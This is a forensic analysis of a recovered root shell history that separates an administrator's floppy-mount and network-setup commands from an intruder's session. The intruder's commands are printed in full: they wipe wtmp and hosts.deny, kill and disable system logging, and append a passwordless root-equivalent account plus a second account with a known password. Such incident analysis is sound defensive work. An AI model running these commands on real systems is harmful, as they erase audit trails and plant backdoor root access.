[--] /root/.bash_history

This file was extracted from /dev/hda8 using strings, grep and common sense.
It can be divided into three sections where 'exit' works as a session
delimiter.

Section 1:  Admin activity, a few seconds after the startup.
---------------------------------------------------------------------------
mkdir /floppy
mount /dev/fd0 /floppy
cd /floppy
rm *gz
./init
umount /floppy
exit
---------------------------------------------------------------------------

Section 2:  Still Admin activity, configuring the network adapter.
---------------------------------------------------------------------------
ifconfig -a
cd /etc/sysconfig
vi network
cd *pts
cd ../net*pts
vi *eth0
ifconfig eth0 172.16.1.107 broadcst 172.16.1.255 netmask 255.255.255.0 up
ifconfig -a
ifconfig eth0 broadcast 172.16.1.255
ifconfig eht0 netmask 255.255.255.0
ifconfig eth0 netmask 255.255.255.0
ifconfig -a
route add default gw 172.16.1.254
netstat -nr
exit
---------------------------------------------------------------------------

Section 3:  BLACKHAT ACTIVITY:  First he got rid of hosts.deny and wtmp,
klogd and syslogd (and forbid their running during startup).  Added
two users: own (=root equivalent without password) and adm1 (regular
user) with password = 'elitenes'.  Finally he assured that he'll be
able to get into the machine using telnet.
---------------------------------------------------------------------------
uptime
rm -rf /etc/hosts.deny
touch /etc/hosts.deny
rm -rf /var/log/wtmp
touch /var/log/wtmp
killall -9 klogd
killall -9 syslogd
rm -rf /etc/rc.d/init.d/*log*
echo own:x:0:0::/root:/bin/bash >> /etc/passwd
echo adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >> /etc/passwd
echo own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow
echo adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412 >> /etc/shadow
cat /etc/inetd.conf | grep tel
exit